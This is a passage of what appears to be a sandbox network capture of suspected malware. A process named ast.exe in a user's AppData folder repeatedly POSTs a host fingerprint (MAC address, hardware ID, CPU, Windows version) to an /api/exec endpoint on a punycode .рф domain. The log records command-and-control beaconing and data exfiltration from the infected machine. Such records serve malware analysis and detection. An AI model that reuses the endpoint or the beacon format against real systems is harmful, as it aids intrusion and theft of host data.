                                                                                                                          2024-11-19 18:15:27 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                          Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          14192.168.2.550030212.193.169.654433380C:\Users\user\AppData\Roaming\fat\ast.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-19 18:15:28 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                          Content-Length: 269
                                                                                                                          2024-11-19 18:15:28 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                          Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          15192.168.2.550033212.193.169.654433380C:\Users\user\AppData\Roaming\fat\ast.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-19 18:15:29 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                          Content-Length: 269
                                                                                                                          2024-11-19 18:15:29 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                          Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          16192.168.2.550036212.193.169.654433380C:\Users\user\AppData\Roaming\fat\ast.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-19 18:15:30 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                          Content-Length: 269
                                                                                                                          2024-11-19 18:15:30 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                          Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          17192.168.2.550039212.193.169.654433380C:\Users\user\AppData\Roaming\fat\ast.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-19 18:15:31 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                          Content-Length: 269
                                                                                                                          2024-11-19 18:15:31 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                          Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          18192.168.2.550042212.193.169.654433380C:\Users\user\AppData\Roaming\fat\ast.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-19 18:15:32 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                          Content-Length: 269
                                                                                                                          2024-11-19 18:15:32 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                          Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          19192.168.2.550045212.193.169.654433380C:\Users\user\AppData\Roaming\fat\ast.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-19 18:15:32 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                          Content-Length: 269
                                                                                                                          2024-11-19 18:15:32 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                          Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          20192.168.2.550048212.193.169.654433380C:\Users\user\AppData\Roaming\fat\ast.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-19 18:15:33 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                          Content-Length: 269
                                                                                                                          2024-11-19 18:15:33 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                          Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          21192.168.2.550051212.193.169.654433380C:\Users\user\AppData\Roaming\fat\ast.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-19 18:15:35 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                          Content-Length: 269
                                                                                                                          2024-11-19 18:15:35 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                          Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          22192.168.2.550054212.193.169.654433380C:\Users\user\AppData\Roaming\fat\ast.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-19 18:15:35 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                          Content-Length: 269
                                                                                                                          2024-11-19 18:15:35 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                          Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          23192.168.2.550057212.193.169.654433380C:\Users\user\AppData\Roaming\fat\ast.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-19 18:15:36 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                          Content-Length: 269
                                                                                                                          2024-11-19 18:15:36 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                          Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          24192.168.2.550060212.193.169.654433380C:\Users\user\AppData\Roaming\fat\ast.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-19 18:15:38 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                          Content-Length: 269
                                                                                                                          2024-11-19 18:15:38 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                          Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.
                                                                                                                          2024-11-19 18:15:38 UTC403OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                          Content-Length: 269
                                                                                                                          1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.19045) x64


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          25192.168.2.550063212.193.169.654433380C:\Users\user\AppData\Roaming\fat\ast.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-19 18:15:38 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                          Content-Length: 269
                                                                                                                          2024-11-19 18:15:38 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                          Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          26192.168.2.550066212.193.169.654433380C:\Users\user\AppData\Roaming\fat\ast.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-19 18:15:39 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                          Content-Length: 269
                                                                                                                          2024-11-19 18:15:39 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                          Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          27192.168.2.550069212.193.169.654433380C:\Users\user\AppData\Roaming\fat\ast.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-19 18:15:40 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                          Content-Length: 269
                                                                                                                          2024-11-19 18:15:40 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                          Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
